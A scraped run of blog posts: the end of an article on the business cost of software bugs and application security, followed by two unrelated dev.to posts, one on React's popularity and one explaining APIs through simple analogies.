When Knight understood that the trades would stand, they had to save themselves by selling off the stocks for nothing. Goldman Sachs stepped in and bought all of Knight's unwanted positions for **$440 million.** By the next summer, the company was acquired by its competitor, Getco LLC. 17 years of dedicated work disappeared in less than one hour.
What went wrong? Several factors caused the failure, yet one of the most important was that a flag previously used to enable Power Peg had been repurposed for new functionality. In other words, the program believed it was in a test environment and executed trades as quickly as possible without caring about losing the spread value.
The Securities and Exchange Commission's report highlighted many other factors, yet the critical one was the missing formal code review and QA process to check that the software had been deployed correctly.
## **The Exponential Cost of Failure**
As seen above, best practices such as DevSecOps and automating SAST throughout the SDLC can produce significant savings by finding and fixing defects and vulnerabilities early. The result is higher-quality, more secure code that forms the foundation of software applications and the software powering devices. What you will see in this section is that there are other cost factors to consider when measuring the ROI of a SAST solution, factors that are not as concrete to calculate.

The average enterprise _individual_ data breach costs a company $4.24 million, the highest average total cost in the 17-year history of IBM's annual ["Cost of a Data Breach Report"](https://www.ibm.com/security/data-breach), per its 2021 edition. While this seems astronomically high, you have to consider all the factors involved in resolving such a breach, not to mention the lasting damage to an organization's brand and reputation. In 2020, it was estimated that software defects of all kinds, including software vulnerabilities, [cost the economy $2 trillion](https://www.ciodive.com/news/poor-software-quality-report-2020/593015/). Unsurprisingly, this is due to software defects making their way through the entire software development lifecycle and manifesting in products delivered to customers.
Here are some things to consider when evaluating the real cost of security vulnerabilities and other software failures:
**Risk and liability** are high with safety-critical devices such as critical infrastructure controls, medical and automotive systems, and aircraft electronics. Failure here could cause human injury or even death. The Prius brake issue turned out to be a software failure that [cost Toyota $5 billion](https://faculty.washington.edu/rbowen/cases/Toyota_Recall_case_April_2011.pdf) to remedy, which included the recall of four million vehicles. The Boeing 737 MAX accidents and grounding of the airplane are likely to [cost Boeing $19 billion](https://www.theguardian.com/business/2020/jan/29/boeing-puts-cost-of-737-max-crashes-at-19bn-as-it-slumps-to-annual-loss).
**Brand and reputation** might be difficult to monetize, but damage to them is certainly a large problem for corporations that have fallen afoul of a large security incident. The Equifax breach and the more recent SolarWinds supply chain attack are two prominent examples. Data breaches [increased by 17% in 2021](https://www.zdnet.com/article/the-biggest-data-breaches-of-2021/), with several high-profile cases like the zero-day vulnerabilities in Microsoft Exchange Server and the [Log4j/Log4Shell vulnerability](https://blogs.grammatech.com/log4j-2-vulnerability-practical-advice-and-whats-next-for-software-supply-chain-security).
**Customer experience** is a leading differentiator in many of today's applications. Poor implementation (design and coding defects), poor security, and poor quality all result in poor customer experience. Performance, for example, can be a significant customer experience issue: Amazon found that [every 100ms of latency in their online applications costs them 1% in sales](https://www.gigaspaces.com/blog/amazon-found-every-100ms-of-latency-cost-them-1-in-sales). Google found that a 500ms delay in search page results dropped traffic by 20%. Customers are flush with choices in today's market; customer experience is key to keeping them.
**Patching and recalls** are inevitable when serious security vulnerabilities or defects are found. In the Toyota case, they had to recall four million vehicles to patch their software. It's expensive to recall and patch your own software, but you are also offloading huge costs onto your customers. Organizations are spending [thousands of hours and millions of dollars](https://www.computerweekly.com/news/252438578/Security-professionals-admit-patching-is-getting-harder) on patch management for software deployed in their environments. There is both an internal and an external cost for security vulnerabilities and defects in software. Every unpatched piece of your code in customers' hands is a liability for them and for you, as it opens up new threat vectors.
**Compliance**, especially for public companies, is a critical part of the business. Failure to manage the risk to your business from security incidents can lead to heavy consequences from the Securities and Exchange Commission (SEC) or Federal Trade Commission (FTC). For example, the Equifax data breach resulted in [$575 million in fines](https://www.csoonline.com/article/3410278/the-biggest-data-breach-fines-penalties-and-settlements-so-far.html) payable to the FTC and CFPB. The Home Depot breach cost $200 million in fines, and the Capital One breach resulted in $190 million. Note these fines are over and above every other cost and liability resulting from the breach.
**Cybersecurity insurance** coverage and premiums are beginning to be impacted by software quality, safety, and security issues. Insurers will begin raising rates or possibly even denying coverage to organizations not following DevSecOps best practices. The SolarWinds attack cost cyber insurance vendors more than [$90 million](https://www.crn.com/news/security/solarwinds-hack-could-cost-cyber-insurance-firms-90-million).
There is tremendous opportunity in reducing these downstream costs with improved software development, shifting security left and automating testing practices.
## [The Economics of AppSec/DevSecOps]

### Effect of software errors on developer labor costs
The time your developers spend finding and fixing bugs is time that costs the business money, plus the opportunity costs of not building new features. As we just covered above, finding and fixing bugs is a big-ticket item in your development lifecycle. So exactly how much does it cost you?
- According to VentureBeat, developers spend [20% of their time fixing bugs](https://venturebeat.com/2017/07/13/developers-spend-20-of-their-time-fixing-problems-and-its-killing-your-company/)
- The average salary for a Software Engineer in the USA is [hovering around $100,000](https://www.indeed.com/career/software-engineer/salaries?from=top_sb)
- That's about **$20,000/year spent on fixing software errors**, per developer
On top of developer salary expenses, unaddressed software errors affect end users, and when your product doesn't work as intended for your customers, support costs start to mount.
You should be aiming for this kind of reactive work (finding and fixing errors, support costs) to take no more than **20% of developer hours, allowing 80% on proactive work** (building features and improving your products) rather than vice versa. If we assume that your team adheres to this **80/20 standard**, based on a 40-hour work week, the average software developer spends **32 hours fixing errors** and replicating issues each month. If you have 50 developers, the combined **1,600 hours of reactive work** could potentially ramp up the cost of software errors to **US$83,000 in lost time per month.**
Then there are the opportunity costs of time spent away from building regular features for customers. Reducing **1,600 hours by 50% to 800 hours** would save your company **US$41,500 every month in salary expenses** while increasing overall product and software quality.
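As a small sketch of the same team-level model (the loaded hourly cost here is an assumption implied by the US$83,000 figure, not a number stated in the text):
```python
devs = 50
monthly_hours_per_dev = 160      # 40-hour weeks
reactive_share = 0.20            # the 80/20 target for reactive work
loaded_hourly_cost = 52          # assumed: ~$83,000 / 1,600 hours

reactive_hours = devs * monthly_hours_per_dev * reactive_share  # 1,600 hours
monthly_cost = reactive_hours * loaded_hourly_cost              # ~$83,200

# Halving reactive work halves the monthly bill.
print(f"{reactive_hours:,.0f} h/month costs ${monthly_cost:,.0f}; "
      f"halved: ${monthly_cost / 2:,.0f}")
```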

### Impact of errors on developer turnover
If you're asking your development team to dedicate huge portions of their working life to the monotonous task of bug-fixing, you're not helping their job satisfaction. We've established that errors shouldn't occupy more than **20% of developer hours**, but there are some nasty stats that show a different reality:
- 26% of developers in a [global survey](https://www.businesswire.com/news/home/20210216005484/en/Rollbar-Research-Shows-That-Traditional-Error-Monitoring-Is-Missing-the-Mark) said that they spend half their time fixing bugs
- 10% in the Western U.S. said this occupies up to 75% of their time
- 44% called bug fixing their biggest pain point
- 55% said it kept them from building new features and functionality
- 12% felt "resentful" about manual bug-fixing
- 7% said it makes them want to quit.
This is especially confronting given that the tech sector has the [highest staff attrition rates of any industry](https://brainhub.eu/library/how-to-lose-developers), and within this, software engineers have an even higher turnover [rate of 21.7%](https://www.growin.com/blog/developer-retention-costs-onboarding/) (for context, the average across all industries is 10.9%). Plus, the business cost to hire a developer [averages $50,000.](https://devskiller.com/true-cost-of-recruiting-a-developer-infographic/)
The upshot? It's a very good investment to give your development team the right tools so that they can spend less time digging through log files and more time doing rewarding work. Plus, this means they're building new features that strengthen your market offering, so it's a win-win.
### Cost of Fixing Bugs
Bugs in code should be found and fixed during the testing phase of the web development life cycle. Otherwise, the real impact of software bugs might cost more than we can imagine. For example, research by the [Systems Sciences Institute](https://www.researchgate.net/figure/IBM-System-Science-Institute-Relative-Cost-of-Fixing-Defects_fig1_255965523) at IBM shows that an error found after product release costs **4x to 5x more** to fix than one uncovered during the design stage. Moreover, it costs **100x more** when software bugs are identified in the maintenance phase.

Clearly, it's harder to fix issues once the product is launched and released. **The later bugs are caught, the more negative consequences they have and the more complicated they can be to resolve.** Late and slow bug fixing can affect product functionality and brand image, and it forces further code changes that might conflict with the initial ones, adding to the cost, time, and effort. So it's essential to track and fix bugs during the early stages of development.
### How Much Would Bug Fixing Cost You?
In one of our previous articles, **"How to hire a dedicated development team: 9 steps to simplify the hiring process"** – read [here](https://amgrade.com/how-to-hire-a-dedicated-development-team-9-steps-to-simplify-the-hiring-process/), we showed statistics on the average hourly rate of software development worldwide. Based on this data, we can calculate **how much bug fixes cost globally.**
The average time to fix a functional (major-level) bug before the launch stage is around 12 hours. So, to calculate the cost of fixing a bug, we multiply the developer's hourly rate by the time to fix it. Here is what we get:
| Region | Cost to fix a major bug (pre-launch) |
| --- | --- |
| North America | $80\*12h = **$960** |
| Western Europe | $75\*12h = **$900** |
| Eastern Europe | $55\*12h = **$660** |
| Africa | $31\*12h = **$372** |
| Asia Pacific | $28\*12h = **$336** |
Now it is much easier to calculate and understand the cost of bug fixes in the maintenance phase: simply **multiply all those numbers by 100.**
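As a quick sketch, here is that calculation in Python, including the roughly 100x maintenance-phase multiplier from the IBM research cited earlier:
```python
# Average hourly rates from the table above; ~12 hours to fix a major bug.
hourly_rates = {
    "North America": 80,
    "Western Europe": 75,
    "Eastern Europe": 55,
    "Africa": 31,
    "Asia Pacific": 28,
}
hours_to_fix = 12
maintenance_multiplier = 100  # IBM: ~100x once the product is in maintenance

for region, rate in hourly_rates.items():
    pre_launch = rate * hours_to_fix
    maintenance = pre_launch * maintenance_multiplier
    print(f"{region}: ${pre_launch:,} pre-launch vs ${maintenance:,} in maintenance")
```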
The high cost of late bug fixing is not the only problem. Business owners should consider that fixing bugs in an already released product causes **a domino effect.** When developers change and fix one part of the code, it ripples into other parts of the codebase, sometimes even into the website design. Thus, delinquent bug fixing might provoke a second round of the SDLC, adding extra cost to that code change.
Due to late bug fixes, your customers receive a slow and buggy application. You lose revenue. Moreover, instead of releasing new product features, improving user experience, and moving forward in product development, the engineering team gets stuck in the fixing process.
According to the [CPSQ report](https://www.it-cisq.org/pdf/CPSQ-2020-report.pdf), in 2020 the total Cost of Poor Software Quality in the US was **$2.08 trillion**, on top of which you can add lost customer interest, failed IT projects, and lost time. To avoid the failure of a new project, we should strive for about **20% reactive work** (finding and fixing defects, support) and **80% proactive work** (building new features and improving our product). If you delay bug fixing, you start a snowball effect and end up with 80% reactive work and only 20% proactive.
As a matter of fact, delayed bug fixes can affect everything in your business project. It starts with **budget overruns and low revenue**, and results in **indirect costs** like lost customer loyalty, damaged brand reputation, wasted time, and the slow death of a project.
The total cost of software bugs can be hard to specify, but a detailed understanding of what software bugs are and their impact on your business is the first step to reducing wasteful spending. Prioritizing, fixing promptly, and focusing on critical errors pays off with a successful project and reduced costs.
## Experts' opinion
The cleanup cost for fixing a bug in a homegrown web application ranges anywhere from **$400 to $4,000**, depending on the vulnerability and the way it's fixed.
Security experts traditionally have been hesitant to calculate the actual cost associated with bug fixes because there are so many variables, including the severity of the vulnerability, differences in man-hour rates, and the makeup of the actual fix.
John Steven, senior director for advanced technology consulting at Cigital, says Grossman's numbers are "dead on." "Cross-site scripting costs very little to fix, for instance, but the regression rate and 'new findings' rates are very high," says Steven, who has done some number-crunching of his own.
Steven says security remediation typically occurs outside of the normal development and quality-assurance cycle. It costs an organization about **$250** to understand a vulnerability finding, **$300** to communicate a vulnerability internally and get "action," and around **$240** to verify the fix itself, he says. A simple bug can take about an hour and a half to fix, or $160 at about $105 per man-hour.
"Endemic problems, like authorization, that require integration with tools take more like **80 to 100 hours**," Steven says, so Grossman's estimate for those cases is right on target.
With XSS, enterprises aren't typically fixing just one XSS bug at a time, either. "Developers tend to fix in batches. So no one fixes [just] one cross-site scripting [bug]," Steven says. Instead, it's more like eight to 20 at a time, he adds, and while some bugs only cost about $400 to fix, others can cost **$9,000 to $11,000** to fix.
A cross-site request forgery (CSRF) vulnerability that requires encryption can require **80 to 100 man-hours** of resources to repair, he says. But a low-budget **$400 XSS fix** is likely to cause more problems later. "Retests will uncover related problems or the same problem elsewhere as a result of that kind of 'fix,'" Steven says.
Still, large sites are facing a major reality check in the costs associated with cleaning up their bugs: WhiteHat's Grossman says it's safe to say that most websites today are full of vulnerabilities, and finding them is a major challenge. The cost of finding those bugs depends on the route an enterprise takes, whether it's a one-time consultant's vulnerability assessment at $10,000 per site or a much less expensive vulnerability scan at around $1,000. And that's just finding the bugs, not fixing them, Grossman says.
---
The next reading, **AppSec and DevSecOps: part 2 - cost of a bug, cases, effectiveness assessment, ROI**, will be published soon. | d3one |
1,663,997 | Why is React so popular today? | Even though it was first released on May 29, 2013, React is still the most popular UI library today. There are several... | 0 | 2023-11-11T18:18:24 | https://dev.to/samiulalimsaad/react-ken-brtmaane-beshi-jnpriyy-4k1f | react, javascript, programming | Even though it was first released on May 29, 2013, React is still the most popular UI library today. There are several reasons for its immense popularity, including:
**Performance**: React re-renders only the parts of the UI that need updating, which makes web applications faster and more efficient.
**Community & support**: React has a strong community that provides developers with a variety of resources and support, including documentation, tutorials, and packages. This helps developers solve problems and learn new concepts.
**Easy to learn**: React is relatively easy to learn, which helps developers adapt quickly to the technology.
**Flexibility**: React is a highly flexible library that can be used to build many different kinds of web applications, helping developers create exactly the applications they need.
**Possibility**: React is a powerful and versatile library that can be used to build many types of web applications. Applications where it has become a popular choice include social media apps, e-commerce apps, and games. React is also used on the client side, for building Android or iOS apps, for browser extensions, and even for desktop apps via ElectronJs.
The React library is also maintained by Facebook and is open source. For all of these reasons, React is the most popular choice today.
| samiulalimsaad |
1,664,279 | API Explained to a 5 year old kid LITERALLY! | Disclaimer This is a blog to explain topics in a funny way and I don't intend to hurt... | 0 | 2023-11-12T05:04:42 | https://dev.to/maiommhoon/api-explained-to-a-5-year-old-kid-literally-5306 | api, webdev, beginners | ## Disclaimer
**This is a blog to explain topics in a funny way and I don't intend to hurt anyone's feelings**
## Introduction
What is an API? Well, it's an Application Programming Interface.
(*gasp*) F**k, that's a huge word! No problem, we will calmly ask Google.

So, I searched it and scanned/read many documents and here's what it means...
## Explained - LITERALLY TO A 5 YEAR OLD KID
OK! So, imagine you are a 5 year old kid! Nice, now you are stupid and I feel superior!
So, you have 7 crayons and you want to give them to your friend who is in the next room! Now, if you are a little bit smart, you won't carry them one by one to his room; rather, you will put them in a box (cuz you have small hands and crayons are large) and give it to him!
Here, you are the user aka stupid, your friend is the application to which you want to pass the data, and the box is the API!
## Explained - Other common EXAMPLE
AGAIN! Imagine you are in a restaurant and you want to order food, but you won't go directly to the chef and ask them to make you the food you want; rather, you will call the waiter and tell him your order, which he will take to the chef! SIMPLE!
Here, you are the Customer aka User, the Chef is the Application, and the API is the Waiter aka low-waged person!
## REAL LIFE EXAMPLE - UbeR
Let's take a look at a real-life example, because this isn't school.
Now, Uber seems like one application, but Behind the Scenes it is a mixture of many service applications like Payment, Order, etc.
[ Splitting work into smaller parts like this is called **Microservice Architecture**, but more on that in other blogs ]
Now, these services have to pass data through APIs to communicate!
It's like they are talking with each other through APIs, the way we use calls, letters, and emails.
BUT FOR YOU IT IS ONE APPLICATION!
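And if you want to see what asking the "waiter" looks like in real code, here is a tiny Python sketch. The URL and fields are completely made up for illustration; the point is just that your code asks the API, and the API brings back a box of data from the application:
```python
import requests  # third-party HTTP client: pip install requests

# Hypothetical endpoint, purely for illustration.
response = requests.get("https://api.example.com/rides/42")

if response.ok:
    ride = response.json()       # the "box" of data the API hands back
    print(ride.get("status"))    # e.g. "driver_on_the_way"
else:
    print("Request failed:", response.status_code)
```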

| maiommhoon |